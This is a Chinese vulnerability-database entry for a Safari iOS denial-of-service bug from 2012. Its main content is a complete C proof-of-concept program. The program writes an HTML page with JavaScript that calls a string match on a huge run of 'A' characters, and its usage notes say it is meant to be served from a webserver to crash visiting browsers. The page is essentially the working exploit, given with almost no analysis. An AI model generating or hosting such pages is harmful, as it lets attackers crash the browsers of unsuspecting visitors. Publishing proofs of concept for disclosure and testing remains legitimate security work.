Safari iOS Denial Of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047289 漏洞类型
发布时间 2012-06-09 更新时间 2012-06-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060099
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*PoC for Safari crash discovered by
 Alberto Ortega @a0rtega, alberto[@]pentbox[.]net

 http://www.livehacking.com/category/vulnerability/apple-vulnerability/
This PoC written by
Larry W. Cashdollar http://vapid.dhs.org @lcashdol

This PoC creates an html file to be served out by a normal webserver. 
It seems the browsers begin to crash when the output
size is 800000+.
usage: ./safari_crash 800000 /var/www/html/crash.html
*/

#include <stdio.h>
#include <stdlib.h>

int
main (int argc, char *argv[])
{

  int x = 0;
  FILE *fout;
  char *payload = "<html>\n<head><title>Crash Safari PoC";
  char *payload2="</title></head>\n<script
type=\"text/javascript\">\nvar s = \"PoC\";\ns.match(\"\0";
  char *payload3 = "\");\n</script>\n</html>\0";

  if (argc < 3)
    {
      printf
    ("Safari Crash PoC\nPlease supply buffer length and filename.\nEx
:%s 800000 crash.html\n",
     argv[0]);
      exit (0);
    }
  fout = fopen (argv[2], "w");

  fprintf (fout, "%s", payload);
  fprintf (fout, "Size : %s x A",argv[1]);
  fprintf (fout,"%s",payload2);
  while (x < atoi (argv[1]))
    {
      fprintf (fout, "A");
      x++;
    }

  fprintf (fout, "%s", payload3);
  fclose (fout);

  return (0);
}